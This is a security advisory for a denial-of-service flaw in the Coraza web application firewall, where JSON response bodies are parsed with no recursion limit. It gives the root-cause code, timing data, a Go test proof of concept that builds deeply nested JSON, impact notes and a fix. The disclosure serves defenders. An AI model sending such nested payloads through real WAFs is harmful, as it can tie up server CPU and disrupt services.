Coraza: Unbounded recursion in JSON response body processor causes CPU exhaustion
Description
### Summary The JSON response body processor parses response bodies with no recursion limit. `ProcessResponse` calls `readJSON(ss, ignoreJSONRecursionLimit)`, and that constant is `-1`. The guard in `readItems` only fires on `== 0`, so counting down from `-1` (-2, -3, ...) never reaches it. The guard is effectively dead on the response path. The request path is fine: `ProcessRequest` passes the configured limit (default 1024). There is no equivalent directive or default for responses. Parsing a deeply nested JSON response is CPU-bound and its cost grows quadratically with nesting depth. A 512 KiB response (the default `ResponseBodyLimit`) holds about 87,000 nesting levels and takes ~12 s to process, keeping one core busy the whole time. ### Root cause `internal/bodyprocessors/json.go` ```go const ignoreJSONRecursionLimit = -1 // line 51 func (js *jsonBodyProcessor) ProcessResponse(reader io.Reader, v ..., _ plugintypes.BodyProcessorOptions) error { ... data, err := readJSON(ss, ignoreJSONRecursionLimit) // line 62, passes -1 } func (js *jsonBodyProcessor) ProcessRequest(...) error { ... data, err := readJSON(ss, bpo.RequestBodyRecursionLimit) // line 32, default 1024 } ``` The guard and the decrement: ```go func readItems(json gjson.Result, objKey []byte, maxRecursion int, res map[string]string) error { if maxRecursion == 0 { // line 106 return errors.New("max recursion reached while reading json object") } ... iterationError = readItems(value, objKey, maxRecursion-1, res) // line 126 ``` Note that `ProcessResponse` discards `BodyProcessorOptions` (the parameter is `_`), so even a caller that wanted to set a limit on responses has no way to. ### Why the cost is quadratic Every nesting level re-parses the remaining nested document through `gjson.ForEach`, so total work is O(n²) in the depth. Numbers below were measured on an Intel Core Ultra 7 255H, Go 1.22.2, gjson v1.18.0, at commit db9850b2 (v3.7.0-55): ``` depth bytes ProcessResponse time 5000 30004 30 ms 10000 60004 119 ms 20000 120004 456 ms 40000 240004 2.18 s 87381 524290 12.09 s ``` Log-log slope between adjacent rows lands between 1.93 and 2.26 (2.09 across the full range), which matches quadratic. Roughly 87,000 levels is the most that fits inside the default 512 KiB `ResponseBodyLimit`. ### PoC Save as `internal/bodyprocessors/poc_json_test.go`, then: ``` go test -v -timeout 120s -run TestPoCJSONResponse ./internal/bodyprocessors/... ``` ```go package bodyprocessors_test import ( "strings" "testing" "time" "github.com/corazawaf/coraza/v3/experimental/plugins/plugintypes" "github.com/corazawaf/coraza/v3/internal/bodyprocessors" "github.com/corazawaf/coraza/v3/internal/corazawaf" ) func nestedJSON(depth int) string { var sb strings.Builder sb.Grow(depth*6 + 4) for i := 0; i < depth; i++ { sb.WriteString(`{"a":`) } sb.WriteString("null") for i := 0; i < depth; i++ { sb.WriteByte('}') } return sb.String() } func TestPoCJSONResponse(t *testing.T) { proc, _ := bodyprocessors.GetBodyProcessor("json") // Request path is bounded, response path is not. body := nestedJSON(5000) v := corazawaf.NewTransactionVariables() errReq := proc.ProcessRequest(strings.NewReader(body), v, plugintypes.BodyProcessorOptions{RequestBodyRecursionLimit: 1024}) errRes := proc.ProcessResponse(strings.NewReader(body), v, plugintypes.BodyProcessorOptions{}) t.Logf("depth=5000 ProcessRequest err=%v", errReq) t.Logf("depth=5000 ProcessResponse err=%v", errRes) // Quadratic scaling on the response path. for _, depth := range []int{5000, 10000, 20000, 40000, 87381} { b := nestedJSON(depth) vv := corazawaf.NewTransactionVariables() start := time.Now() proc.ProcessResponse(strings.NewReader(b), vv, plugintypes.BodyProcessorOptions{}) t.Logf("depth=%-6d bytes=%-7d time=%v", depth, len(b), time.Since(start)) } } ``` Output on the reference machine: ``` depth=5000 ProcessRequest err=max recursion reached while reading json object depth=5000 ProcessResponse err=<nil> depth=5000 bytes=30004 time=30.3ms depth=10000 bytes=60004 time=119.3ms depth=20000 bytes=120004 time=456.1ms depth=40000 bytes=240004 time=2.185s depth=87381 bytes=524290 time=12.085s ``` ### Impact This needs `ResponseBodyAccess` turned on and a backend that returns JSON (`application/json`). Reflection endpoints, download APIs that serve user-supplied content, and JSON error responses that echo back user input are all plausible ways to route a nested body back through the WAF. The work happens in a single goroutine and is CPU-bound: the body is already in memory, so there is no I/O during the parse. Each such request holds one core for its entire run, about 12 s per 512 KiB body at the default limit. N concurrent requests take N cores. The request path has enforced a recursion limit since v3.3.3; responses never have. ### Suggested fix Bound `ProcessResponse` the same way the request path is bounded: add a `ResponseBodyRecursionLimit` directive, or just pass `RequestBodyRecursionLimit` instead of `-1`.
CVSS v3.1 base metrics
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:HMedium severity
Band computed from the CVSS base score, not the source's own label — so it means the same thing across every feed.
AV
Network
Attack Vector
AC
High
Attack Complexity
PR
None
Privileges Required
UI
None
User Interaction
S
Unchanged
Scope
C
None
Confidentiality
I
None
Integrity
A
High
Availability
Affected
- Vendor
- Go
- Product
- github.com/corazawaf/coraza/v3
Versions
- pkg:golang/github.com/corazawaf/coraza/v3 >= 3.0.0, < 3.8.0
Stated as the source expressed them.
References
- advisoryOSV GHSA-3c6w-j9xm-8h2hhttps://osv.dev/vulnerability/GHSA-3c6w-j9xm-8h2h
- otherOSV webhttps://github.com/corazawaf/coraza/security/advisories/GHSA-3c6w-j9xm-8h2h
- otherOSV webhttps://github.com/corazawaf/coraza/commit/cae3c7407e7b84372c207033de03f15f89bf351a
- vendorOSV packagehttps://github.com/corazawaf/coraza
- otherOSV webhttps://github.com/corazawaf/coraza/releases/tag/v3.8.0
Related threats
same CWE or vendorCVE-2026-19498 — IBM Security Verify Access 10.0 through 10.0.9.2 and IBM Verify Identity Access 11.0 through 11.0.3 could allow a remote attacker to cause a denial…
CVE-2026-19498 · 2h ago
CVE-2026-107386 — amqp091-go is a Go AMQP 0.9.1 client.
CVE-2026-107386 · 4h ago
CVE-2026-107376 — webonyx graphql-php is a PHP implementation of the GraphQL specification.
CVE-2026-107376 · 5h ago
Coraza: Resource exhaustion via deferred file handle accumulation in multipart body processor
OSV · 5h ago
Coraza: URL-encoded form Content-Type parameters bypass Coraza body inspection
OSV · 5h ago
Coraza: Multipart filename* (RFC 5987) charset restriction lets a decoy filename bypass FILES-based rules
OSV · 5h ago